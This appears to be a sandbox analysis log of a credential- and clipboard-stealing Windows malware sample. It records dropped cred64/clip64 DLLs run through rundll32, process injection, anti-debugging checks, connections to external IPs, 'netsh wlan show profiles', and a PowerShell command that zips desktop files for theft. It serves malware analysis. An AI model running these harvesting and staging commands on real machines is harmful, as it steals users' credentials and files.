Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Window / User API: threadDelayed 9621	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6403	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3391	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7907
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3410
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6390
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2121
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7875

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	API coverage: 2.6 %

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972	Thread sleep count: 9621 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972	Thread sleep time: -288630000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 7040	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 7044	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe TID: 6972	Thread sleep time: -3330000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460	Thread sleep count: 6403 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344	Thread sleep count: 3391 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924	Thread sleep count: 7907 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924	Thread sleep time: -7907000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924	Thread sleep count: 2089 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6924	Thread sleep time: -2089000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756	Thread sleep count: 2121 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756	Thread sleep time: -2121000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756	Thread sleep count: 7875 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5756	Thread sleep time: -7875000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C05BD9F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,

12_2_6C05BD9F

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_002E93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_002E93D0

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini	Jump to behavior

Source: tOuVwTJrau.exe, 00000000.00000003.1670615027.0000000001243000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000006.00000002.2138710552.000002583962C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWmNt(
Source: Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2137636900.0000021E0669D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839577000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.000002583962C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2924024643.0000000003116000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[$
Source: rundll32.exe, 00000004.00000002.2137636900.0000021E06647000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: rundll32.exe, 0000000C.00000002.2924024643.0000000003116000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: netsh.exe, 00000007.00000003.1737233028.0000018763765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: netsh.exe, 00000009.00000003.1737357431.0000020FC2F45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_0030F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0030F25D

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030E250 mov eax, dword ptr fs:[00000030h]	0_2_0030E250
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_003166E2 mov eax, dword ptr fs:[00000030h]	0_2_003166E2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010E250 mov eax, dword ptr fs:[00000030h]	1_2_0010E250
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_001166E2 mov eax, dword ptr fs:[00000030h]	1_2_001166E2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010E250 mov eax, dword ptr fs:[00000030h]	2_2_0010E250
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_001166E2 mov eax, dword ptr fs:[00000030h]	2_2_001166E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C05B881 mov eax, dword ptr fs:[00000030h]	12_2_6C05B881
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C05A254 mov eax, dword ptr fs:[00000030h]	12_2_6C05A254

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_00320BE2 GetProcessHeap,

0_2_00320BE2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0030F25D
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0030A895
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_0030A9F8 SetUnhandledExceptionFilter,	0_2_0030A9F8
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: 0_2_00309FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00309FA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0010F25D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0010A895
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_0010A9F8 SetUnhandledExceptionFilter,	1_2_0010A9F8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 1_2_00109FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00109FA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010F25D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0010F25D
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010A895 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0010A895
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_0010A9F8 SetUnhandledExceptionFilter,	2_2_0010A9F8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 2_2_00109FA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00109FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C059820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6C059820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C057288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6C057288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C056B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6C056B1A

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.147 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.148 80

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_002E8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_002E8070

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_0030AA7F cpuid

0_2_0030AA7F

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: EnumSystemLocalesW,	0_2_003227B8
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: EnumSystemLocalesW,	0_2_00322803
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: EnumSystemLocalesW,	0_2_003188AC
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: EnumSystemLocalesW,	0_2_0032289E
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00322929
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetLocaleInfoW,	0_2_00322B7C
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00322CA2
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetLocaleInfoW,	0_2_00322DA8
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetLocaleInfoW,	0_2_00318DCE
Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00322E77
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00122516
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00122711
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_001227B8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_00122803
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_0012289E
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_001188AC
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00122929
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00122B7C
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00122CA2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00122DA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00118DCE
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00122E77
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_001227B8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_00122803
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_0012289E
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_001188AC
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00122929
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_00122B7C
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00122CA2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_00122DA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_00118DCE
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00122E77

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
